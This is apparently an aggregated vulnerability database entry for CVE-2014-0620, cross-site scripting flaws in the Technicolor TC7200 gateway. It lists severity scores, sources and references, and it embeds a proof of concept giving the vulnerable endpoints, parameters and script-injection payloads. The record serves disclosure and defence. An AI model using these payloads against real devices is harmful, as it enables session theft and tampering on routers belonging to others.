Details of VAR-201401-0350

ID

VAR-201401-0350

CVE

CVE-2014-0620

TITLE

Technicolor TC7200 Vulnerable to cross-site scripting

Trust: 0.8

sources: JVNDB: JVNDB-2014-001005

DESCRIPTION

Multiple cross-site scripting (XSS) vulnerabilities in Technicolor (formerly Thomson) TC7200 STD6.01.12 allow remote attackers to inject arbitrary web script or HTML via the (1) ADDNewDomain parameter to parental/website-filters.asp or (2) VmTracerouteHost parameter to goform/status/diagnostics-route. (1) parental/website-filters.asp of ADDNewDomain Parameters (2) goform/status/diagnostics-route of VmTracerouteHost Parameters. The Technicolor TC7200 is a next-generation wireless home gateway device. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. Technicolor TC7200 STD6.01.12 is vulnerable. Technicolor (formerly known as Thomson, Thomson) TC7200 is a modem and router product of the French Technicolor Group. The vulnerability comes from the parental/website-filters.asp script not correctly filtering the 'ADDNewDomain' parameter and the goform/status/diagnostics-route script not correctly filtering the 'VmTracerouteHost' parameter. # Exploit Title: Technicolor TC7200 - Multiple XSS Vulnerabilities # Google Dork: N/A # Date: 02-01-2013 # Exploit Author: Jeroen - IT Nerdbox # Vendor Homepage: http://www.technicolor.com/en/solutions-services/connected-home/modems-gatew ays/cable-modems-gateways/tc7200-tc7300 # Software Link: N/A # Version: STD6.01.12 # Tested on: N/A # CVE : CVE-2014-0620 # # Proof of Concept: # # ## Persistent Cross Site Scripting: # # POST : http://<ip>/parental/website-filters.asp # Parameters: # # WebFilteringTable 0 # WebFilteringChangePolicies 0 # WebFiltersADDKeywords # WebFilteringdomainMode 0 # ADDNewDomain <script>alert('IT Nerdbox');</script> # WebFiltersKeywordButton 0 # WebFiltersDomainButton 1 # WebPolicyName # WebFiltersRemove 0 # WebFiltersADD 0 # WebFiltersReset 0 # # ## Reflected Cross Site Scripting # # POST : http://<ip>//goform/status/diagnostics-route # Parameters: # # VmTracerouteHost "><script>alert('IT Nerdbox');</script> # VmMaxTTL 30 # VmTrIsInProgress 0 # VmTrUtilityCommand 1 # # Check out the video at: http://www.nerdbox.it/technicolor-tc7200-xss-vulnerabilities/

Trust: 2.61

sources: NVD: CVE-2014-0620 // JVNDB: JVNDB-2014-001005 // CNVD: CNVD-2014-00092 // BID: 64672 // VULHUB: VHN-68113 // PACKETSTORM: 124648

IOT TAXONOMY

category:

['Network device']

sub_category:

Trust: 0.6

sources: CNVD: CNVD-2014-00092

AFFECTED PRODUCTS

vendor:	technicolor	model:	tc7200	scope:	eq	version:	std6.01.12	Trust: 2.4
vendor:	technicolor	model:	tc7200	scope:	eq	version:	-	Trust: 1.0
vendor:	technicolor	model:	tc7200	scope:	-	version:	-	Trust: 0.6
vendor:	technicolor	model:	tc7200 std6.01.12	scope:	-	version:	-	Trust: 0.3

sources: CNVD: CNVD-2014-00092 // BID: 64672 // JVNDB: JVNDB-2014-001005 // CNNVD: CNNVD-201401-101 // NVD: CVE-2014-0620

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov:	CVE-2014-0620
value:	MEDIUM
Trust: 1.0
NVD:	CVE-2014-0620
value:	MEDIUM
Trust: 0.8
CNVD:	CNVD-2014-00092
value:	MEDIUM
Trust: 0.6
CNNVD:	CNNVD-201401-101
value:	MEDIUM
Trust: 0.6
VULHUB:	VHN-68113
value:	MEDIUM
Trust: 0.1

nvd@nist.gov:	CVE-2014-0620
severity:	MEDIUM
baseScore:	4.3
vectorString:	AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector:	NETWORK
accessComplexity:	MEDIUM
authentication:	NONE
confidentialityImpact:	NONE
integrityImpact:	PARTIAL
availabilityImpact:	NONE
exploitabilityScore:	8.6
impactScore:	2.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 1.8
CNVD:	CNVD-2014-00092
severity:	MEDIUM
baseScore:	4.3
vectorString:	AV:N/AC:M/AU:N/C:P/I:N/A:N
accessVector:	NETWORK
accessComplexity:	MEDIUM
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	NONE
availabilityImpact:	NONE
exploitabilityScore:	8.6
impactScore:	2.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.6
VULHUB:	VHN-68113
severity:	MEDIUM
baseScore:	4.3
vectorString:	AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector:	NETWORK
accessComplexity:	MEDIUM
authentication:	NONE
confidentialityImpact:	NONE
integrityImpact:	PARTIAL
availabilityImpact:	NONE
exploitabilityScore:	8.6
impactScore:	2.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.1

sources: CNVD: CNVD-2014-00092 // VULHUB: VHN-68113 // JVNDB: JVNDB-2014-001005 // CNNVD: CNNVD-201401-101 // NVD: CVE-2014-0620

PROBLEMTYPE DATA

problemtype:

CWE-79

Trust: 1.9

sources: VULHUB: VHN-68113 // JVNDB: JVNDB-2014-001005 // NVD: CVE-2014-0620

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201401-101

TYPE

xss

Trust: 0.7

sources: PACKETSTORM: 124648 // CNNVD: CNNVD-201401-101

CONFIGURATIONS

sources: JVNDB: JVNDB-2014-001005

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-68113

PATCH

title:

TC7200 - TC7300 Cable Gateway - Technicolor

url:

http://www.technicolor.com/en/solutions-services/connected-home/modems-gateways/cable-modems-gateways/tc7200-tc7300

Trust: 0.8

sources: JVNDB: JVNDB-2014-001005

EXTERNAL IDS

db:	NVD	id:	CVE-2014-0620	Trust: 3.5
db:	EXPLOIT-DB	id:	30668	Trust: 2.3
db:	BID	id:	64672	Trust: 2.0
db:	JVNDB	id:	JVNDB-2014-001005	Trust: 0.8
db:	CNNVD	id:	CNNVD-201401-101	Trust: 0.7
db:	CNVD	id:	CNVD-2014-00092	Trust: 0.6
db:	PACKETSTORM	id:	124648	Trust: 0.2
db:	SEEBUG	id:	SSVID-84043	Trust: 0.1
db:	VULHUB	id:	VHN-68113	Trust: 0.1

sources: CNVD: CNVD-2014-00092 // VULHUB: VHN-68113 // BID: 64672 // JVNDB: JVNDB-2014-001005 // PACKETSTORM: 124648 // CNNVD: CNNVD-201401-101 // NVD: CVE-2014-0620

REFERENCES

url:	http://www.exploit-db.com/exploits/30668	Trust: 1.7
url:	http://www.securityfocus.com/bid/64672	Trust: 1.1
url:	http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0620	Trust: 0.8
url:	http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-0620	Trust: 0.8
url:	http://www.exploit-db.com/exploits/30668/	Trust: 0.6
url:	http://www.nerdbox.it/technicolor-tc7200-xss-vulnerabilities/	Trust: 0.4
url:	http://www.technicolorbroadbandpartner.com/	Trust: 0.3
url:	http://www.technicolor.com/en/solutions-services/connected-home/modems-gatew	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2014-0620	Trust: 0.1
url:	http://<ip>//goform/status/diagnostics-route	Trust: 0.1
url:	http://<ip>/parental/website-filters.asp	Trust: 0.1

sources: CNVD: CNVD-2014-00092 // VULHUB: VHN-68113 // BID: 64672 // JVNDB: JVNDB-2014-001005 // PACKETSTORM: 124648 // CNNVD: CNNVD-201401-101 // NVD: CVE-2014-0620

CREDITS

Jeroen

Trust: 0.4

sources: BID: 64672 // PACKETSTORM: 124648

SOURCES

db:	CNVD	id:	CNVD-2014-00092
db:	VULHUB	id:	VHN-68113
db:	BID	id:	64672
db:	JVNDB	id:	JVNDB-2014-001005
db:	PACKETSTORM	id:	124648
db:	CNNVD	id:	CNNVD-201401-101
db:	NVD	id:	CVE-2014-0620

LAST UPDATE DATE

2025-04-11T23:17:14.510000+00:00

SOURCES UPDATE DATE

db:	CNVD	id:	CNVD-2014-00092	date:	2014-01-08T00:00:00
db:	VULHUB	id:	VHN-68113	date:	2015-07-24T00:00:00
db:	BID	id:	64672	date:	2014-01-02T00:00:00
db:	JVNDB	id:	JVNDB-2014-001005	date:	2014-01-10T00:00:00
db:	CNNVD	id:	CNNVD-201401-101	date:	2014-01-09T00:00:00
db:	NVD	id:	CVE-2014-0620	date:	2025-04-11T00:51:21.963

SOURCES RELEASE DATE

db:	CNVD	id:	CNVD-2014-00092	date:	2014-01-08T00:00:00
db:	VULHUB	id:	VHN-68113	date:	2014-01-08T00:00:00
db:	BID	id:	64672	date:	2014-01-02T00:00:00
db:	JVNDB	id:	JVNDB-2014-001005	date:	2014-01-10T00:00:00
db:	PACKETSTORM	id:	124648	date:	2014-01-02T14:04:44
db:	CNNVD	id:	CNNVD-201401-101	date:	2014-01-09T00:00:00
db:	NVD	id:	CVE-2014-0620	date:	2014-01-08T15:30:02.683